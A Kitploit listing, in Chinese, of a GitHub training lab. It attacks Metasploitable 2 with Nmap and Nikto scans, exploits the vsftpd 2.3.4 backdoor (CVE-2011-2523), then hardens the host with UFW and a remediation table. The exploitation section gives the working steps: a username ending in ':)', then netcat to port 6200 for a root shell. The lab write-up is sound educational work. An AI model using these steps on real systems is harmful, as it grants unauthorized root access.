Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
network-security-lab — 受控的虚拟攻防实验室 — CVE-2011-2523 漏洞利用、Nmap 侦察、Nikto 扫描、UFW 强化,均在 Metasploitable 2 上实现 | Kitploit
工具/GitHubGitHub/amirmuhammadmarvi/network-security-lab
侦察漏洞扫描器漏洞分析漏洞利用配置审计Web安全网络安全渗透测试学习与教育

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
实验室与实践
GitHubamirmuhammadmarvi/network-security-lab

network-security-lab

受控的虚拟攻防实验室 — CVE-2011-2523 漏洞利用、Nmap 侦察、Nikto 扫描、UFW 强化,均在 Metasploitable 2 上实现

查看仓库
33个月前尚未审核

🔬 网络安全实验室

一个模拟真实攻击与防御场景的受控虚拟环境

Python Platform CVE Status


📋 概述

本实验室在一个完全隔离的虚拟环境中模拟了真实的渗透测试和防御加固练习。它演示了完整的攻击性安全生命周期——从侦察到利用——以及能够缓解每种风险的防御控制措施。

关键成果: 通过利用已知后门,在无需凭据且无特殊工具的情况下,于60秒内获取了目标机器的完全 root 访问权限。


🏗 实验室环境

组件详情
虚拟机管理程序VMware Workstation
网络仅主机模式 / NAT(完全隔离)
攻击机操作系统Ubuntu 24 LTS
目标操作系统Metasploitable 2 (Linux 2.6.x)
攻击机 IP192.168.148.255
目标 IP192.168.148.130

🎯 方法论

root@kitploit:~
侦查  →  扫描  →  利用  →  防御与加固

🔍 第一阶段 — 侦查

使用 Nmap 进行端口扫描

root@kitploit:~
sudo nmap -sV -O 192.168.148.130 -oN scan_before.txt

关键发现—共23个开放端口:

使用 Nikto 进行 Web 扫描

root@kitploit:~
nikto -h http://192.168.148.130 -o nikto_before.txt

发现18个漏洞,包括:

  • phpMyAdmin 对外暴露
  • phpinfo.php 泄露完整服务器配置
  • 启用了 HTTP TRACE(XST 攻击)
  • 启用了 /doc/、/test/ 目录索引
  • 版本过旧的 Apache 2.2.8 和 PHP 5.2.4

💥 第二阶段 — 利用

CVE-2011-2523 — vsftpd 2.3.4 后门

vsftpd 2.3.4 包含一个由供应链攻陷引入的后门。发送以 :) 结尾的用户名会导致服务器在 6200 端口打开一个 root shell。

root@kitploit:~
# 步骤 1 — 通过 FTP 触发后门
ftp 192.168.148.130
# 用户名: backdoor:)   密码: 任意内容

# 步骤 2 — 连接到生成的 shell
nc 192.168.148.130 6200

# 步骤 3 — 验证访问权限
whoami
# → root

结果: 在 < 60 秒 内获得了完全的 root 级别系统访问权限——无需凭据、无需利用框架。

影响: 拥有 root 权限的攻击者可以读取/修改/删除任何文件、安装恶意软件、窃取数据或横向移动至网络中的其他主机。


🛡 第三阶段 — 防御与加固

UFW 防火墙 — 默认拒绝策略

root@kitploit:~
sudo ufw enable
sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw allow 22/tcp    # 仅允许 SSH
sudo ufw status verbose

推荐的修复措施


📄 完整报告

请参阅 report.md 获取完整评估——包括完整方法论、命令输出、发现表、利用步骤以及所有修复建议。


⚠️ 法律免责声明

本实验室是在完全隔离的虚拟环境中使用故意存在漏洞的软件(Metasploitable 2)进行的。所有技术仅用于教育和作品集展示目的。请勿在你未拥有或未经明确书面许可的系统上复现。


🛠 使用的工具

工具

作者:Amir Mohammad Marwi

Portfolio LinkedIn GitHub

下载工具
端口服务版本风险
21FTPvsftpd 2.3.4🔴 严重 — 已知后门 (CVE-2011-2523)
22SSHOpenSSH 4.7p1🟡 中 — 版本过旧
23TelnetLinux telnetd🟠 高 — 明文协议
80HTTPApache 2.2.8🟠 高 — 多个 CVE
1524绑定 shellRoot shell🔴 严重 — 开放的 root shell
3306MySQL5.0.51a🟠 高 — 数据库暴露
5900VNC协议 3.3🟠 高 — 弱认证
6667IRCUnrealIRCd🔴 严重 — 已知后门
漏洞修复
vsftpd 2.3.4 后门升级至 vsftpd 3.x 或迁移至 SFTP
开放的 root shell(端口 1524)立即禁用,审计安装过程
Telnet(端口 23)禁用——强制仅使用 SSH
phpMyAdmin 暴露按 IP 限制,要求强认证
MySQL 暴露(端口 3306)绑定至 localhost,阻止外部访问
VNC 暴露(端口 5900)按 IP 限制或禁用
目录索引Apache: Options -Indexes
HTTP TRACEApache: TraceEnable off
版本过旧的 Apache + PHP升级至受支持的 LTS 版本
用途
Nmap端口扫描和服务检测
NiktoWeb 漏洞扫描
Netcat连接后门 shell
UFW基于主机的防火墙配置
FTP 客户端触发 vsftpd 后门
VMware Workstation实验室虚拟化